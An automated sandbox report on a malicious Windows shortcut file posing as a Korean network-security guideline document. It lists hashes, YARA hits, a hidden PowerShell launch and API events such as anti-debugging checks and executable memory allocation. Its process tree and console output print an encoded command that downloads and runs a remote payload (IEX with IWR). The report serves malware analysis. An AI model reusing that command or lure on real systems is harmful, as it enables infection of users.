Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Feb. 19, 2025, 3:18 p.m.	Feb. 19, 2025, 3:21 p.m.

Size	2.6MB
Type	MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hide
MD5	`084513677755c0e4b2cd57a5e68bbd3d`
SHA256	`7c439a86f2571a1a55de741c5aa003ab343416f01fe9ebd3c90886b418eb8c35`
CRC32	`3D1B5F93`
ssdeep	`24576:2fIAkL0bm6KHy+qhHD+NPNWu+kvTg505zj6RO+eg9tAYW17GSBS1DCeK:+kL00Hy+qh6rn+kbF9ABeg9tAJFDzB`
Yara	Antivirus - Contains references to security software Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "RItDrWoFJmtOz" "C:\Users\test22\AppData\Local\Temp\국가 망 보안체계 가이드라인(요약).lnk"
3024
- powershell.exe "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -e LgAvACoALgBwAGQAZgA7AEkARQBYACgASQBXAFIAIAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADUAMAAuADEAMAAwAC8AdAAuAHcAbwBmAGYAMgAnAC0AVQBzAGUAQgBhAHMAaQBjAFAAKQA= -w hIdDeN
  2196

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Feb. 19, 2025, 3:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 3:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 3:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 3:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 3:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 3:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Feb. 19, 2025, 3:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Feb. 19, 2025, 3:18 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Feb. 19, 2025, 3:18 p.m.			0	0

Command line console output was observed (16 events)

Time & API	Arguments	Status	Return
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: The term './*.pdf' is not recognized as the name of a cmdlet, function, script console_handle: 0x00000023	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: file, or operable program. Check the spelling of the name, or if a path was inc console_handle: 0x0000002f	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: luded, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: At line:1 char:8 console_handle: 0x00000047	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: + ./*.pdf <<<< ;IEX(IWR 'http://192.168.50.100/t.woff2'-UseBasicP) console_handle: 0x00000053	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: + CategoryInfo : ObjectNotFound: (./*.pdf:String) [], CommandNotF console_handle: 0x0000005f	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: oundException console_handle: 0x0000006b	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: The term 'IWR' is not recognized as the name of a cmdlet, function, script file console_handle: 0x00000097	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: , or operable program. Check the spelling of the name, or if a path was include console_handle: 0x000000a3	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: d, verify that the path is correct and try again. console_handle: 0x000000af	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: At line:1 char:16 console_handle: 0x000000bb	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: + ./*.pdf;IEX(IWR <<<< 'http://192.168.50.100/t.woff2'-UseBasicP) console_handle: 0x000000c7	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: + CategoryInfo : ObjectNotFound: (IWR:String) [], CommandNotFound console_handle: 0x000000d3	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: Exception console_handle: 0x000000df	1	1
WriteConsoleW Feb. 19, 2025, 3:18 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000eb	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3030 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2f70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c3270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2830 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c35b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c34f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2db0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Feb. 19, 2025, 3:18 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c2b70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Feb. 19, 2025, 3:18 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 138 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a00000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73922000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02732000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02733000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02734000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02767000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02752000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02765000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02735000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0275c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02736000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0276c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02753000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02754000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02755000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02756000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02757000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02758000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02759000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a05000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a06000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a07000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a08000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a09000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a0f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 19, 2025, 3:18 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

